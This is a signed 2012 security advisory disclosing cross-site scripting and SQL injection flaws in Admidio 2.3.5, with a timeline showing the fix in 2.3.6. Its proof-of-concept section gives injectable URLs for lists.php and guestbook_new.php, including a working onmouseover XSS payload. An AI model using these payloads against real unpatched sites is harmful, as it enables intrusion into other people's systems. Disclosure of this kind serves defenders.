Admidio version 2.3.5 suffers from cross site scripting and remote SQL injection vulnerabilities.
aaef337b3e36f2b58275e83626d4bd8d96b1b635d5408e61e4b59a8aa2eb9489
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Advisory: Admidio 2.3.5 Multiple security vulnerabilities
Advisory ID: SSCHADV2012-019
Author: Stefan Schurtz
Affected Software: Successfully tested on Admidio 2.3.5
Vendor URL: http://www.admidio.org/
Vendor Status: fixed
==========================
Vulnerability Description
==========================
Admidio 2.3.5 is prone to XSS and SQLi vulnerabilities
==================
PoC-Exploit
==================
//SQLi
http://[target]/admidio-2.3.5/adm_program/modules/lists/lists.php?active_role=[sql-injection]
//XSS
http://[target]/admidio-2.3.5/adm_program/modules/guestbook/guestbook_new.php?headline="
onmouseover=alert(/xss/) "
=========
Solution
=========
Upgrade to the latest version 2.3.6
====================
Disclosure Timeline
====================
21-Aug-2012 - developer informed
21-Aug-2012 - feedback from developer
28-Aug-2012 - fixed in version 2.3.6
========
Credits
========
Vulnerabilities found and advisory written by Stefan Schurtz.
===========
References
===========
http://www.admidio.org/forum/viewtopic.php?t=5108
http://www.darksecurity.de/advisories/2012/SSCHADV2012-019.txt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (MingW32)
Comment: Thunderbird-Portable 3.1.20 by GnuPT - Gnu Privacy Tools
Comment: Download at: http://thunderbird.gnupt.de
iEYEARECAAYFAlBByQ4ACgkQg3svV2LcbMC4kwCeK+vGuSrJ4qHy2ILFE8arppud
gjgAn3eJnDuVB94NXFAbVZUraLUcjlVq
=wJLS
-----END PGP SIGNATURE-----